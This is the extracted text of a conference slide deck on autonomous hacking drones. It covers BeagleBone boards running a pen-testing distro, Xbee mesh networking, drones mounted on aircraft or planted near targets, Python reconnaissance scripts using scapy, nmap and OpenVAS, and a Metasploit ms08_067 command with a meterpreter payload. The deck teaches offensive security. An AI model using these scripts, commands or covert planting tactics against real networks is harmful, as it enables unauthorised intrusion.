Dr. Phil Polstra@ppolstra

Bloomsburg University of Pennsylvania

Autonomous Remote Hacking Drones

What is this talk about?l Hacking and/or forensics with small, low-power devicesl ARM-based Beagleboard & Beaglebone running full suite of

security/forensics toolsl Performing coordinated attacks with networks of devicesl Using aerial drones for performing and supporting attacksl Leveraging Python to make attack semi-autonomous

Why You Should Carel A full-featured Linux install for flexibilityl Low-power devices can run for days on battery powerl Small devices can be planted for later retrievall Network of devices enhances hacking from a distancel Aerial drone can be flown around target

l Can be useful for initial reconnaissancel May be only practical way to access certain targets

l Aerial drone can be landed nearby (roof?)l Remote hacking dronel Router for other drones planted nearbyl Combination router and drone

Who am I?

l Professor at Bloomsburg University of Pennsylvanial Programming from age 8l Hacking hardware from age 12l Also known to fly and build airplanes

5

Roadmapl Choosing a hacking platforml Aircraft choicesl The Deck – your new favorite pen testing distrol Solo ops with The Deckl Networking with 802.15.4l Building Dronesl Attacking with an army of devices running The Deckl Aerial drone scenariosl Making attacks more autonomous with Python

6

Choosing a Hacking Platforml Smalll Low-powerl Affordablel Maturel Networking built inl Good USB supportl Convenient input and output

7

And the Winning Platform is...l BeagleBone Black

l 3.4” x 2.1”l <10 Watts (board itself <2 W)l Only $45l Based on 1GHz Cortex A8l 512MB RAMl 100 Mbps Ethernet built inl high-speed USB plus USB-on-the-gol HDMI and LCD outputl RS-232, webcam, plentiful GPIO, and microSD

BeagleBone Black (aka Raspberry Pi killer)

I know at least one of you will ask...

l Why not Raspberry Pi?l Not as powerfull Doesn't run Ubuntu (ARM6 not supported)l Not truly open (Broadcom won't release info)l Not as maturel Raspberry Pi cost more to build full systeml Still limited availability (especially in USA)l Not as reliable (reported quality and power issues)l Inefficient – uses more power despite running at lower clock speedl Limited GPIOl GPIO is not buffered (easy to fry boards)l Fragile design (pins vs. headers)l Not as compact

10

Choosing an Aircraftl Good payloadl Can fly in windy conditionsl Capable of vertical takeoff/landing (VTOL)l Reasonable flight timel Space for BeagleBone Blackl Space for Xbeel Space for Alfa wifi adapterl Affordable

11

And the winning aircraft is...

12

Quadshotl Flying wing with VTOLl Good wind tolerancel Half a pound of payloadl Flight as an airplane is more energy efficient and

helps in high winds (8-15 minutes)l Some models use Xbeel Built in camera mount

The Deck – Your New Favorite Distro

l Originally developed for BeagleBoard-xMl Ported to run on BeagleBone Blackl Optimized for the Beagles

l Not someone's half-way effort to port desktop distrol Desktop or drone

l All the packages you need (over 1600)l Based on Ubuntu

l Good repository supportl Good community supportl Minimizes need to build tools from source

l Running latest kernels

14

Demo 1 – Our Favorite Exploit

15

Demo 1 (contd.)

16

Demo 1 (contd.)

17

Demo 2 – Wifi Cracking

18

Demo 2 (contd.)

19

Demo 2 (contd.)

20

Demo 3 – Password Cracking

21

Demo 4 – WPS Cracking

22

Demo 4 (contd.)

23

Demo 5 – Pwn Win7 Like Its a Mac

24

Demo 5 (contd.)

25

Demo 6 – Clickiddiestm

26

802.15.4 Networkingl Basicsl Hardwarel Simple case: 2 Xbee adaptersl Slightly harder case: multiple adapters one at a timel Hard case: multiple adapters simultaneouslyl Really Hard case: true mesh network

27

802.15.4 Basicsl Typically used in low-power embedded systemsl Regular (300') and Pro (1 mi) versionsl AT and API modes of operationl Low-speed (250 kbps max)l Supports multiple network topologies

l Peer to Peerl Starl Mesh

28

Xbee Hardware

29

Xbee Hardware (contd)

l Manufactured by Digil Regular and Pro formats are interchangeable and inter-operablel Power consumption at 3.3V is 50/295 mA for regular/prol Uses 2 mm pin spacing

l Most breadboards are 0.1” or 2.54 mml Requires an adapter

l Several antenna optionsl Be careful not to mix S1 with S2 (ZB) series which are the

same dimensions, but are not compatible

30

Series 1 vs. Series 2l Series 1 (the original)

l Slightly higher power consumption (50 vs 40 mA) for regular version

l Works out of the boxl Not true mesh networking

l Series 2 (2B and ZB)l Must have firmware loaded for each function (coordinator, router,

end device)l Every network must have a coordinatorl Coordinators and routers may not go to sleepl Recommended for larger pen tests

Simple Case: 2 Xbee Adaptersl Xbee modules must be configured for desired network

topologyl Digi provides X-CTU software for configuration, but

it only runs on Windows (or use Wine)l Recently Moltosenso has released Network Manager

IRON 1.0 which runs on Linux, Mac, and Windows – free edition is sufficient for our limited usage

32

Configuring Xbee Modulesl Place Xbee module in USB adapter and connect to PC running X-CTU or

IRONl Select correct USB port and set baud rate (default is 9600)l From Modem Configuration tab select Read to get current configurationl Ensure modem is XB24 and Function Set is XBEE 802.15.4 for Series 1l Set the channel and PAN ID (1337?) noting the settings which must be the

same for all modemsl Pick a Destination Low and Destination High address for the other adapter

(say 2 and 0)l Set the My Address to a chosen value (say 01)l Click Write to stored the new config on the Xbeel Repeat this process on the second Xbee but reverse the addressesl The modules should now talk to each other just fine

Configuring Xbee Modules (contd)

34

Simple Case: Accessing your single drone

l By default Xbee adapters operate in transparent mode

l Setup TTY on drone and you can login in with terminal programl Simplel Works with interactive programsl If you go out of range you are still connected when

you return

35

Starting TTY on your dronel Create a file with the following in /etc/init# ttyO2 - getty# This service maintains a getty on ttyO2 from the point the system is# started until it is shut down again.start on stopped rc RUNLEVEL=[2345]stop on runlevel [!2345]respawnexec /sbin/getty -8 57600 ttyO2l Start with “sudo start ttyO2” (letter O not a zero!)l Use favorite terminal program to connect

36

Slightly Harder Case: Multiple Drones One at a Time

l Configure drones as with the single drone case but with different MY addresses

l Use terminal program on command console to connect to drones one at a time

l Simple: no programming requiredl Must enter AT command mode to switch between drones

l Enter “+++” (no enter) and wait for OKl Enter “ATDL0002 <enter>” to select drone 2l Enter “ATWR <enter>” to write to NVRAMl Enter “ATCN <enter>” to exit command mode

37

Slightly Harder Case: Multiple Drones Simultaneously

l API mode is used vs. AT model Configure Xbee with X-CTU

l For Series 1 stick with 802.15.4 Function Setl For Series 2 (ZB)l Drones set to Function Set ZNET 2.5

ROUTER/ENDDEVICE API 1347l Controller set to Function Set ZNET 2.5

COORDINATOR API 1147l Router can be used to extend range to command console

l Multiple choices for communicationl Java xbee-apil Python-xbee (what I used)l Raw commands to TTY device

l Recommended for most situations involving 3 or more devices

38

Multiple Drone Communications

l Really this is a point-to-multipoint topologyl For each drone communication appears to be simple

peer-to-peerl API mode provides better performance and allows

simpler software operation

39

Multiple Drones Using Python: One Possibility

l Each drone runs a simple Python script which waits for commands and sends announcements

l Controller listens for announcements/responses and sends commands (all activity is logged)

l Upside is that it lends itself easily to scriptingl Downside is that it doesn't support interactive shells

(yet)l Announcements can be sent to controller for

important events (such as successful cracking)l Code is available at https://github.com/ppolstra

40

Harder Case: True Mesh Network

l Recommended when using larger number of drones or when devices are too far apart

l Devices configured as routers or coordinators will have reduced battery life (no sleep)

l Requires series 2 (2B or ZB) Xbee adaptersl No changes to scripts are required

41

True Mesh Networking (contd)l At least one modem must have coordinator

firmwarel Routers can extend range

l Pro adapters recommendedl Drones can use regular adapters to save powerl Routers need not be connected to a Drone

l Easier to leverage Xbee adapter sleep modes on end devices

42

Building Drones

43

Getting The Deckl Download the archive from

http://sourceforge.net/projects/thedeck/l Also download the MeshDeck if using 802.15.4l Note apt archives removed to save 1.7GB of space

l Upload The Deck to microSD cardl Class 10 8GB or largerl Extract archive to your Linux boxl From your Linux box “sudo ./setup_sd.sh –mmc

/dev/sdX –uboot bone”l Will take a while (20-30 minutes)

l Ready to run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm

l If running the MeshDeckl Extract the archive to the dronel Run the install script

44

Power Your Drones

l Beagles take standard 2.1 x 5.5 mm barrel connectorl Battery voltage above 5V is wasted as heatl Bare board can run for several days off standard batteries (~220mA)l LCD touchscreens require lots of power!l Leaching off of USB power from a target is ideall Be careful with WiFi and 802.15.4

l Set transmit power to minimuml Take advantage of sleep modes on 802.15.4 radios

45

Power Options

Battery Size

Approx. Runtime

D 54.5 hrs

C 27.3 hrs

AA 13.6 hrs

9V or AAA 6.8 hrs

Latern 50 hrs

USB 5200 23.6 hrs

46

802.15.4 Hardware

47

802.15.4 Hardware

48

Xbee Adapters

l UART (serial) adaptersl Can be wired directly to Beagles using 4 wiresl Don't take up USB ports

l Xbee cape out soon

49

Xbee Adapters (contd)

l USB Adaptersl More expensivel Helpful for initial setup of modeml Easier to setup: just plug it inl Laptop connection

50

Wiring the Xbee to Beagles

If you splurged for the USB adapter you can just plug in to a USB port

l BeagleBone has only 1 USB port which you might want for something else (WiFi?)

l BeagleBoard has 4 USB portsl Using the UART interface slightly more

complicatedl Connect 4 wires: 3.3V, Ground, TX, RXl Configure the Beagle multiplexer for proper

operationl If you have an Xbee cape just plug it in

51

Setting up a UART Interface

l Appropriate pins & modes in Beagle manualsl For BeagleBone UART2

l 3.3V & Ground P9 pin 3 & 1, respectivelyl TX P9 pin 21 (to Xbee Din)l RX P9 pin 22 (to Xbee Dout)

l Add the following lines to /etc/rc.local BEFORE the exit 0 at the end:l # setup the MeshDeck dronel echo BB-UART2 > /sys/devices/bone_capemgr.8/slotsl sleep 2l /etc/init.d/meshdeckd start

52

Capes

l Work in progressl Xbee cape with socket for Xbee radiol Pwnage capel Xbee socketl Network switch for installing inlinel USB hubl Optional 802.11 wirelessl AirDeck cape to fly aerial drone

53

Containers

54

Containers

55

Plantables

56

Plantables

57

Building the AirDeckl If you only want a router to extend range

l Buy the Xbee board from Transition Roboticsl Program the Xbee modem as a routerl Install the board

l To install a drone on the Quadshot will needl BBBl Xbee modeml Xbee cape (either DIY or purchased)l Alfa AWUS036H wireless adapterl 2.1 x 5.5 mm barrel connector for powerl Short (3-6”) microUSB A-B cable

58

AirDeck (contd)

l Entire setup installed on brain coverl Place BBB on cover as shown mark 4 hole locations with 1/8” drill bitl Connect to lid using 4-40 screws and standoffs or similarl 3 nuts per screw

l 1 on outside to secure screwl 2 to lock BBB on lid

59

AirDeck (contd)

l Remove the BBB from the lidl Take the Alfa out of its casel Test fit it to the inside of the cover as

shownl Mark the location of 3/8” hole for antennal Drill the 3/8” hole then install on lid to mark

mount holesl Drill mount holes

l Install with 4-40 screwsl Seal with black tape to prevent shorting with LIA

board

60

AirDeck (contd)l Cut notches for power cable and USB cable as shown

in pictures using rotary tooll You may have to cut back the hard plastic and/or

metal shield on USB cablel Solder the 2.1 x 5.5 barrel connector

l Center is connected to Vcc on LIAl Outer conductor is connected to Ground on LIAl UART connectors on upper left are probably best

choice for connectionl Install Xbee cape and secure with cable tiesl Install lid and plug in barrel connectorl Go forth and pwn!

61

AirDeck Ready for Pwnage

Networked attacks – Simplest Case

l In the simplest case there is only 1 dronel Networking is peer-to-peerl Allows hacking from a distance

l Better WiFi hacking when drone is in buildingl Drone runs 24x7l Drone can run for days off batteryl Important updates such as successfully cracked passwords

can be sent to master periodically in case you weren't in range when they happened

l Drone has full version of The Deck – lots of possibilitiesl Less conspicuous than sitting outside the buildingl If you are lucky you can patch into wired networkl If you are extra lucky they use Power Over Ethernet!

63

Networked Attack with Multiple Drones

l One process on master monitors status updates from all drones

l Interactive shell into each dronel Multiple subshells can be createdl Processing continues if master disconnects

l Endless possibilities since each drone has full version of The Deck

l Drone are easily retasked based on objectives achieved by other drones

64

Demo 7 - Trivial example of Two Drones in TTY Mode

65Demo 8 - Trivial Example with Two Drone – API Mode Using Python

66

Python Mode (continued)

67

Python Mode (continued)

68

Python Mode (continued)

69

AirDeck Scenario 1l Router only mode

l Used to extend the range of drones planted nearby target

l Drones may be using regular Xbee adapters to save powerl Flyby if there are no good landing spots nearbyl Land if possiblel Flat roof could be good choicel Router can run for days off Quadshot battery

70

AirDeck Scenario 2l AirDeck is only drone

l Useful when drones can't be easily plantedl Battery on Quadshot allows extended operationl Best situation allows you to land on a roof where

the AirDeck isn't detectedl If you screw up and crash on the roof you may

still be able to retrieve “your RC toy” from target later

71

AirDeck Scenario 3l AirDeck combined with other dronesl Other drones are planted

l Inside leeching power from targetl Outside running off of batteryl Other drones likely using regular Xbee adapters to save

powerl AirDeck Xbee adapter configured as a coordinator

or router

Automating with Python

from scapy.all import *# create a list to store networksap_list = []# define a function to be called with each received packetdef packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8 : # is this a network that I used to know? if pkt.addr2 not in ap_list : ap_list.append(pkt.addr2) print "Network %s with ESSID %s detected on channel %s " % (pkt.addr2, pkt.info, str(ord(pkt[Dot11Elt:3].info)))# main function sniffs for a minute then exits def main() : print "Sniffing for wireless networks" sniff(iface="mon0", prn=packet_handler, timeout=60) print "All done"if __name__ == '__main__' : main()

Detecting Wireless Networks

from scapy.all import *import optparse# create a list to store networksclient_list = []pkt_list = []# define a function to be called with each received packetdef packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) : pkt_list.append(pkt) # is this a client that I used to know? if pkt.addr2 not in client_list : client_list.append(pkt.addr2) print "Client: " + str(pkt.addr2) + " detected"

Capturing Wireless Packets

def main() : # parse command line options parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>') parser.add_option('-b', dest='bssid', type='string', help='target BSSID') parser.add_option('-e', dest='essid', type='string', help='target ESSID') (options, args) = parser.parse_args() bssid = options.bssid essid = options.essid # if essid and bssid aren't specified exit if (essid == None ) | (bssid == None): print parser.usage exit(0) print "Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid) sniff(iface="mon0", prn=packet_handler, timeout=60) pktcap = PcapWriter(essid + '.pcap', append=True, sync=True) pktcap.write(pkt_list) pktcap.close() print "All done" exit(0)if __name__ == '__main__' : main()

Capturing Wireless Packets(contd)

Finding Out What’s Thereimport nmap, optparse, jsonihost_list = []def main() : # parse command line options parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>') parser.add_option('-t', dest='target_net', type='string', help='target host or network') parser.add_option('-o', dest='nmops', type='string', help='additional nmap options') parser.add_option('-p', dest='ports', type='string', help='port(s) to scan') (options, args) = parser.parse_args() target_net = options.target_net nmops = options.nmops ports = options.ports # if no target is specified then exit if target_net == None : print parser.usage exit(0) # now perform the scan nm = nmap.PortScanner() # if arguments and ports aren't specified use some defaults if ports == None : ports = '1-1024' if nmops == None : nmops = '-sV -O' nm.scan(target_net, ports, nmops)

Finding Out What’s There (contd) #print the results for host in nm.all_hosts() : # if it isn't up don't bother to print anything about it if nm[host]['status']['state'] == 'up' : host_list.append(nm[host]) print '---------------------------------' if nm[host].has_key('addresses') : print "live host detected at %s " % (nm[host]['addresses']['ipv4']) else :print "live host detected at %s " % (nm[host]['hostname']) # now iterate over services if 'tcp' in nm[host].keys() :print 'TCP services detected on the following ports:'for port in nm[host]['tcp'] : print "Port: " + str(port) for k, v in nm[host]['tcp'][port].items() : print " " + str(k) + ": " + str(v) if 'udp' in nm[host].keys() :print 'UDP services detected on the following ports:'for port in nm[host]['udp'] : print "Port: " + str(port) for k, v in nm[host]['udp'][port].items() : print " " + str(k) + ": " + str(v) fp = open('nmap-scan.json', 'wb') json.dump(host_list, fp) fp.close() if __name__ == '__main__' : main()

import optparse, json, time, xml.etree.ElementTree as EThost_list = []def main() : # parse command line options parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>') parser.add_option('-u', dest='user', type='string', help='OpenVAS user') parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost') parser.add_option('-p', dest='password', type='string', help='OpenVAS password') (options, args) = parser.parse_args() user = options.user password = options.password ovhost = options.ovhost # if no user specified then exit if user == None : print parser.usage exit(0) if ovhost == None : ovhost = 'localhost' # load the host list from JSON file fp = open('nmap-scan.json', 'rb') host_list = json.load(fp) fp.close()

Detecting the Vulnerable

Detecting the Vulnerable (contd)# create the list of targets from nmap scan results targets = "" for host in host_list : targets += str(host['addresses']['ipv4']) + ',' targets = rstrip(targets, ',') # now do the scan manager = openvas.omplib.OMPClient(host=ovhost) manager.open(user, password) manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan') task_id = manager.create_task('openvas-scan', target='nmap-targets') report_id = manager.start_task(task_id) # it will take some time for this scan to run so check every minute while True : time.sleep(60) status = manager.get_task_status(task=task_id) if "done" in status.itervalues() : break report = manager.get_report(report_id) print ET.tostring(report) if __name__ == '__main__' : main()

General formatmsfcli /exploit/platform/type/exploit RHOST=<target address> PAYLOAD=platform/payload/bind_method OPTIONX=something OPTIONY=somethingl I.E.msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp

Script-based Exploitation

81

Future Directionsl Continue to add useful packages as need

arisesl Optimize some packages for BB-xM/BBBl Optimize and expand 802.15.4 codel Other output devicesl Exploit USB OTG functionalityl Replace LIA autopilot with BBB in AirDeck

dronel Hack over the Internet with 802.15.4 gateway

82

Coming Soon

Use coupon Code CNF314For 30% offThis and ANYSyngress title

..

Questions?Feel free to track me down during the con or @ppolstra

later